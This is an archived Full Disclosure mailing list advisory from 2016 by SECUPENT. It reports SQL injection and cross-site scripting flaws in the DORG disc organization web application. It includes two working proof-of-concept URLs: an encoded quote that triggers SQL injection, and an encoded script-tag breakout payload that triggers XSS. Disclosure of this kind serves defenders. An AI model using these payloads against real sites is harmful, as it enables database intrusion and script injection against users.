Full Disclosure mailing list archives
DORG - Disc Organization System SQL Injection And Cross Site Scripting
From: SECUPENT Research Center <research () secupent com>
Date: Sun, 20 Mar 2016 18:33:38 +0600
Exploit Title: DORG - Disc Organization System SQL Injection And Cross Site Scripting Software Link: http://www.opensourcecms.com/scripts/details.php?scriptid=479 Author: SECUPENT Website:www.secupent.com Email: research{at}secupent{dot}com Date: 20-3-2016 SQL Injection: link: http://localhost/dorg/results.php?q=3&search=%2527&type=3 Screenshot: http://secupent.com/exploit/images/drogsql.jpg Cross Site Scripting (XSS): link: http://localhost/dorg/results.php?q=%27%22--%3E%3C%2fstyle%3E%3C%2fscRipt%3E%3CscRipt%3Ealert%280x00194A%29%3C%2fscRipt%3E&search=Search&type=3 Screenshot: http://secupent.com/exploit/images/drogxss.jpg
Attachment:
drog.txt
Description:
_______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Current thread:
- DORG - Disc Organization System SQL Injection And Cross Site Scripting SECUPENT Research Center (Mar 20)